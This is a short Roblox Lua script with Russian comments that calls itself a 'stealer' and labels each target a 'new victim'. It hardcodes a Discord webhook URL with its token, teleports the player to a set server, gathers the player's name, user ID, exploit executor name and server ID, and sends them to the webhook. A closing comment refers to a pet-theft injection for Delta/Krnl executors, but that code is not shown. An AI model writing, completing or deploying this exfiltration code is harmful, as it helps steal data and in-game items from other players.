Конфиг
local webhook = "https://discord.com/api/webhooks/1400776689843437568/X2ntT5vjl8IC-8Vcfb-m8UIvzxJjtz2HtCDLDshapvhmQTIF0Bl24SDHqA56iS18HjVx"

Телепорт в лобби
game:GetService("TeleportService"):TeleportToPlaceInstance(126884695634066, "2aabd422-63f3-42ae-ba80-ca27604952c0")

Сбор данных
local player = game.Players.LocalPlayer
local data = {
    ["content"] = "```🛑 НОВАЯ ЖЕРТВА 🛑```",
    ["embeds"] = {{
        ["title"] = "✅ Стиллер активирован",
        ["fields"] = {
            {["name"] = "Никнейм:", ["value"] = player.Name},
            {["name"] = "User ID:", ["value"] = player.UserId},
            {["name"] = "Эксплойт:", ["value"] = (identifyexecutor or getexecutorname)()},
            {["name"] = "Сервер:", ["value"] = game.JobId}
        },
        ["color"] = 16711680
    }}
}

Отправка в Discord
syn.request({
    Url = webhook,
    Method = "POST",
    Headers = {["Content-Type"] = "application/json"},
    Body = game:GetService("HttpService"):JSONEncode(data)
})

 Инжект кражи питомцев (адаптирован под Delta/Krnl)
 (основной код стиллера) 
